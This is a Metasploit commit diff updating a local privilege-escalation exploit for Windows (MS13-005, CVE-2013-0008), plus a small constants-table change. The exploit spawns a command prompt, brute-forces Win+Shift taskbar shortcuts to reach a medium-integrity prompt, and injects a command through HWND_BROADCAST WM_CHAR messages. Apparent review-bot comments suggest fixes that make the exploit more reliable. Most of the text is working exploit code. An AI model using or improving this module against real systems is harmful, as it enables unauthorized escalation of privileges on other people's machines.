Add api constants and tidy

bug/bundler_fix
Meatballs 2013-07-26 01:48:39 +01:00
parent 0235e6803d
commit b99ad41a64
2 changed files with 89 additions and 38 deletions


@ -48,6 +48,7 @@ class ApiConstants
# Slurp in a giant list of known constants. # Slurp in a giant list of known constants.
# #
def self.add_constants(win_const_mgr) def self.add_constants(win_const_mgr)
win_const_mgr.add_const('HWND_BROADCAST',0x00000FFFF)
win_const_mgr.add_const('MCI_DGV_SETVIDEO_TINT',0x00004003) win_const_mgr.add_const('MCI_DGV_SETVIDEO_TINT',0x00004003)
win_const_mgr.add_const('EVENT_TRACE_FLAG_PROCESS',0x00000001) win_const_mgr.add_const('EVENT_TRACE_FLAG_PROCESS',0x00000001)
win_const_mgr.add_const('TF_LBI_TOOLTIP',0x00000004) win_const_mgr.add_const('TF_LBI_TOOLTIP',0x00000004)
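Review bot: The new `HWND_BROADCAST` entry is written as `0x00000FFFF`, nine hex digits, while every neighbouring constant in this table uses the eight-digit `0x0000XXXX` form; the value itself (0xFFFF) is correct, so this is a formatting point only. `win_const_mgr.add_const('HWND_BROADCAST',0x0000FFFF)` keeps the column width consistent and stops a reader wondering whether a digit was dropped or doubled. The enclosing add_constants method continues well past this hunk.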


@ -16,8 +16,19 @@ class Metasploit3 < Msf::Exploit::Local
def initialize(info={}) def initialize(info={})
super( update_info( info, super( update_info( info,
'Name' => 'MS13-005 Low Integrity to Medium Integrity Privilege Escalation', 'Name' => 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation',
'Description' => %q{ 'Description' => %q{
The Windows kernel does not properly isolate broadcast messages from low integrity
applications from medium or high integrity applications. This allows commands to be
broadcasted to an open medium or high integrity command prompts allowing escalation
of privileges. We can spawn a medium integrity command prompt, after spawning a low
integrity command prompt, by using the Win+Shift+# combination to specify the position
of the command prompt on the taskbar. We can then broadcast our command and hope that
the user is away and doesn't corrupt it by interracting with the UI.
Broadcast issue affects versions Windows Vista, 7, 8, Server 2008, Server 2008 R2,
Server 2012, RT. Spawning a command prompt with the shortcut key does not work in
Vista so you will have to check if the user is already running a command prompt
and set SPAWN_PROMPT false.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -34,9 +45,27 @@ class Metasploit3 < Msf::Exploit::Local
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate'=> "Nov 27 2912" 'DisclosureDate'=> "Nov 27 2012",
# References CVE-2013-0008 'References' =>
[
[ 'CVE', '2013-0008' ],
[ 'MSB', 'MS13-005' ],
[ 'OSVDB', '88966'],
[ 'URL', 'http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html' ]
]
)) ))
register_options(
[
OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true])
], self.class
)
register_advanced_options(
[
OptBool.new('EEGG', [false, '',])
]
)
end end
def win_shift(number) def win_shift(number)
@ -44,11 +73,13 @@ class Metasploit3 < Msf::Exploit::Local
bscan = 0x81 + number bscan = 0x81 + number
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0) client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0) client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
sleep(0.01)
client.railgun.user32.keybd_event(vk, bscan, 0, 0) client.railgun.user32.keybd_event(vk, bscan, 0, 0)
sleep(0.01)
client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0) client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0) client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
end end
def count_cmd_procs def count_cmd_procs
@ -58,48 +89,67 @@ class Metasploit3 < Msf::Exploit::Local
count += 1 count += 1
end end
end end
puts count
vprint_status("Cmd prompt count: #{count}")
return count return count
end end
# Run Method for when run command is issued def cleanup
def exploit if datastore['SPAWN_PROMPT']
@payload_name = datastore['PAYLOAD'] vprint_status("Rehiding window...")
@payload_arch = framework.payloads.create(@payload_name).arch client.railgun.user32.ShowWindow(@hwin, 0)
# syinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
hwin = client.railgun.kernel32.GetConsoleWindow()['return']
if hwin == nil
hwin = client.railgun.user32.GetForegroundWindow()['return']
end end
puts client.railgun.user32.ShowWindow(hwin, 0) end
puts client.railgun.user32.ShowWindowAsync(hwin, 5)
def exploit
# syinfo is only on meterpreter sessions
e = "V2FrZSB1cCwgTmVvLi4uDQpUaGUgTWF0cml4IGhhcyB5b3UuLi4NCkZvbGxv\ndyB0aGUgV2hpdGUgUmFiYml0Lg=="
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
if datastore['SPAWN_PROMPT']
@hwin = client.railgun.kernel32.GetConsoleWindow()['return']
if @hwin == nil
@hwin = client.railgun.user32.GetForegroundWindow()['return']
end
#client.railgun.user32.ShowWindow(@hwin, 0)
#client.railgun.user32.ShowWindow(@hwin, 5)
# Spawn low integrity cmd.exe # Spawn low integrity cmd.exe
li_cmd_pid = client.sys.process.execute("cmd.exe", nil, {'Hidden' => false }).pid print_status("Spawning Low Integrity Cmd Prompt")
windir = client.fs.file.expand_path("%windir%")
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
count = count_cmd_procs count = count_cmd_procs
# Win+Shift+? spawned = false
number = 0 # Bruteforce taskbar position Win+Shift+?
begin # Ruby DoWhile! print_status("Bruteforcing Taskbar Position")
i = (9 - number) 9.downto(1) do |number|
vprint_status("Attempting Win+Shift+#{number}")
win_shift(number) win_shift(number)
number += 1
sleep(1) sleep(1)
end while count_cmd_procs == count and number <= 9
print_status "Spawned!!!" if count_cmd_procs > count
print_good("Spawned Medium Integrity Cmd Prompt")
spawned = true
break
end
end
client.sys.process.kill(li_cmd_pid) client.sys.process.kill(li_cmd_pid)
payload = "calc.exe"
hwnd_broadcast = 0xffff fail_with(Exploit::Failure::Unknown, "No Cmd Prompt spawned") unless spawned
wm_char = 0x0102 end
print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
payload = Rex::Text.decode_base64(e) if datastore['EEGG']
payload.each_char do |c| payload.each_char do |c|
client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, c.unpack('c').first, 0) print c
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
sleep(0.01)
end end
print_line
client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, 'VK_RETURN', 0) print_status("Executing command...")
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
end end
end end
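Review bot: `payload` is nil on the default path of `exploit`: the removed `payload = "calc.exe"` default has no replacement, and the new `payload = Rex::Text.decode_base64(e) if datastore['EEGG']` only assigns when the advanced EEGG option is set, so with the option as registered (`OptBool.new('EEGG', [false, '',])`, no default) the following `payload.each_char` raises NoMethodError on nil, after the low-integrity prompt has already been spawned and killed; because the local is declared by that assignment it also shadows the framework's `payload` accessor rather than falling back to it. The broadcast string needs an unconditional source, either the previous default or a datastore option, e.g. `payload = datastore['EEGG'] ? Rex::Text.decode_base64(e) : "calc.exe"`, with a `fail_with` if it is empty. Separately, `c.unpack('c').first` yields a signed byte, so any non-ASCII character in the command would be sent as a negative wParam; `c.ord` is what WM_CHAR expects. The EEGG option's description is also an empty string; something like `'Broadcast an easter-egg message instead of the payload command'` tells the operator what it does.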